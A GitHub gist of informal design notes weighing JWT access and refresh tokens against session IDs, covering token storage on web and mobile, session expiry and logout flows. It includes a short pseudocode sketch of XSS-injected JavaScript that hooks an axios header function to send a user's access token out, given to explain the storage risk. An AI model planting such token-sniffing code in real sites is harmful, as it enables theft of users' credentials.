srghma/jwt auth vs session id.md

Created October 22, 2020 14:04

Star 0 You must be signed in to star a gist
Fork 0 You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/srghma/6894b830f3a5832e3d0a81f0f47941d3.js"></script>
Save srghma/6894b830f3a5832e3d0a81f0f47941d3 to your computer and use it in GitHub Desktop.

Download ZIP

Raw

jwt auth vs session id.md

https://imgur.com/a/K78R1fj

Author

srghma commented Oct 22, 2020

Storing access token/refresh token

first, refresh tokens:

on web - storing refresh token in localStorage is not safe (based on an explanation from hasura/graphql-engine#2205 (comment))
on mobile - storing refresh token when using Cordova in localStorage - is not safe too and https://ionicframework.com/docs/native/secure-storage should be used (but you know that)

I would also tell that:

on web - storing access token in memory is not 100% safe too (maybe)

because, suppose our site was XSSed - malicious user (MU) could find how to sniff your token

// your code

let jwtAccessTokenRef = null

axios.useHeader(() => { Authentication: `Basic ${jwtAccessTokenRef}` })

// xss injected code

const oldHeaderCreator = axios.SOMEHOW

axios.useHeader(() => {
  const oldHeader = oldHeaderCreator()
  send(oldHeader)
  return oldHeader
})

Web vs mobile UX flows

on web we may want:

session with static expiration - log out after 7days after first login
rolling session - log out after 1d after last request

on mobile:

we dont want to log out EVER
BUT IF mobile phone was stolen - we want to have a page on web where we forget about this mobile phone
OR IF password was changed - log out (maybe)

access token (AT) / refresh token (RT) - where they came from?

AT/RT approach came from oauth

AT is a cached , short lived (e.g. valid for 15min) result of expensive validating RT (long lived, e.g. 7d).

By this I mean:

WHEN on /refresh-access-token, client exchanges old RT and gets a new AT and new RT
BEFORE THIS security provider can check if user_id in RT is blacklisted/whitelisted

JWT AT/RT vs JWT session-id like approach

on web it's better to use

https://imgur.com/a/K78R1fj

(found in this comment hasura/graphql-engine#2205 (comment))

on Web, it's better to use session-id, unless:

you want a speed and don't want to make a db request
you are using 3d party security provider (Auth0)
you are using microservice (e.g. 3d party file server) and you don't want it to make requests to security provider

what are other possible clients

bonus: on web - we want to log out

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment